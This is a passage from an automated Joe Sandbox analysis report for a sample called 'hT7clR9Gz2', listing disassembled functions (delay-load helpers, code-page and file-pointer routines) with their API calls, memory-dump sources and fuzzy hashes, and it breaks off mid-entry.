                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: c73854e8ccad32f44755b21f26ac3dabe7f5f032dc64557614d4249dc5d532df
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: c73854e8ccad32f44755b21f26ac3dabe7f5f032dc64557614d4249dc5d532df
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: b07573c12cb4c0a41e920ce8a73a4631842f410e1aded80c14a3a238bd67314f
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: b07573c12cb4c0a41e920ce8a73a4631842f410e1aded80c14a3a238bd67314f
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 3bdd6d4a737f810d9e5fa96de51f452d4a268356fff1309da321a7a328dc632b
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 3bdd6d4a737f810d9e5fa96de51f452d4a268356fff1309da321a7a328dc632b
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 231dc1afa22dfd3fa0729d2e905aef398b3713c27b2c5035a09c479c877f3e8f
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 231dc1afa22dfd3fa0729d2e905aef398b3713c27b2c5035a09c479c877f3e8f
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 2400ac081d49f12584a9916aaec6110578c6ce620afd737ca7bedbd52f3dcce3
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 2400ac081d49f12584a9916aaec6110578c6ce620afd737ca7bedbd52f3dcce3
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 8486539c43d0f7992add794d1db5c77f162d3cba221c3953fa2b4f5ca66796ac
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 8486539c43d0f7992add794d1db5c77f162d3cba221c3953fa2b4f5ca66796ac
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: e8e73f1591ca595a69ab7c835b728efa01ac57e28e22eba210aa59e095cc0282
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: e8e73f1591ca595a69ab7c835b728efa01ac57e28e22eba210aa59e095cc0282
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: e845960ebbea8948133f28d412e157e68f5912986751c7ea66a8b79c8ac81cdf
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: e845960ebbea8948133f28d412e157e68f5912986751c7ea66a8b79c8ac81cdf
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE1E3
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: }
                                                                      • API String ID: 1269201914-3008617099
                                                                      • Opcode ID: 41fd3760076da794b30f6bc4eb3fb35267a06088017befe8dd0968a9426bf5dd
                                                                      • Instruction ID: db87a27f010d87303fc61bb121ae584a67bb874314acc892cd6514eafdc94ec6
                                                                      • Opcode Fuzzy Hash: 41fd3760076da794b30f6bc4eb3fb35267a06088017befe8dd0968a9426bf5dd
                                                                      • Instruction Fuzzy Hash: 93A001E62A918AFC310A72526E0AC3B022DC4C5B65334992FF916C9681A89968552872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      • Opcode ID: 5b1229ad76ff86d3176bd22a439c735de4877822ba2b9840cb813128b8f75c41
                                                                      • Instruction ID: bc9be656ba20406d12f4bdb61b6b9c343a00997a39c007883f06d93a5e720c8b
                                                                      • Opcode Fuzzy Hash: 5b1229ad76ff86d3176bd22a439c735de4877822ba2b9840cb813128b8f75c41
                                                                      • Instruction Fuzzy Hash: 18A001D66AD58AFC310A72556E0AC3F263DC4D6FA5370A92FF916CC681A8881C552871
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      • Opcode ID: 3af8431ebd59f13b267dbc1bc5d04bbb46cc589231617d2ba183b845ea6e01b0
                                                                      • Instruction ID: bc9be656ba20406d12f4bdb61b6b9c343a00997a39c007883f06d93a5e720c8b
                                                                      • Opcode Fuzzy Hash: 3af8431ebd59f13b267dbc1bc5d04bbb46cc589231617d2ba183b845ea6e01b0
                                                                      • Instruction Fuzzy Hash: 18A001D66AD58AFC310A72556E0AC3F263DC4D6FA5370A92FF916CC681A8881C552871
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      • Opcode ID: b8ae97efbf709e29d65487e223e41c94f4274926a7e363c71bdd4d2433962776
                                                                      • Instruction ID: bc9be656ba20406d12f4bdb61b6b9c343a00997a39c007883f06d93a5e720c8b
                                                                      • Opcode Fuzzy Hash: b8ae97efbf709e29d65487e223e41c94f4274926a7e363c71bdd4d2433962776
                                                                      • Instruction Fuzzy Hash: 18A001D66AD58AFC310A72556E0AC3F263DC4D6FA5370A92FF916CC681A8881C552871
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE51F
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: PDGu<}
                                                                      • API String ID: 1269201914-3101634298
                                                                      • Opcode ID: 06c1696bba0eefb7b1c98bbdb989df80ab088850d3ccfc199899c6ef3f508a92
                                                                      • Instruction ID: bc9be656ba20406d12f4bdb61b6b9c343a00997a39c007883f06d93a5e720c8b
                                                                      • Opcode Fuzzy Hash: 06c1696bba0eefb7b1c98bbdb989df80ab088850d3ccfc199899c6ef3f508a92
                                                                      • Instruction Fuzzy Hash: 18A001D66AD58AFC310A72556E0AC3F263DC4D6FA5370A92FF916CC681A8881C552871
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007EB7BB: GetOEMCP.KERNEL32(00000000,?,?,007EBA44,?), ref: 007EB7E6
                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007EBA89,?,00000000), ref: 007EBC64
                                                                      • GetCPInfo.KERNEL32(00000000,007EBA89,?,?,?,007EBA89,?,00000000), ref: 007EBC77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
                                                                      • Opcode ID: 813588706ea55031d4224473b9205afbcf860005939dbcfd78b9b077a832283a
                                                                      • Instruction ID: b2ef35f2085502458b89ed4931ba606cb12741c146b523f10a3736901d476d11
                                                                      • Opcode Fuzzy Hash: 813588706ea55031d4224473b9205afbcf860005939dbcfd78b9b077a832283a
                                                                      • Instruction Fuzzy Hash: 00517770A052859EDB20CF77C8856BBBFF5EF49300F28406ED4968B262D73C9905CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,007C9A50,?,?,00000000,?,?,007C8CBC,?), ref: 007C9BAB
                                                                      • GetLastError.KERNEL32(?,00000000,007C8411,-00009570,00000000,000007F3), ref: 007C9BB6
                                                                      Memory Dump Source
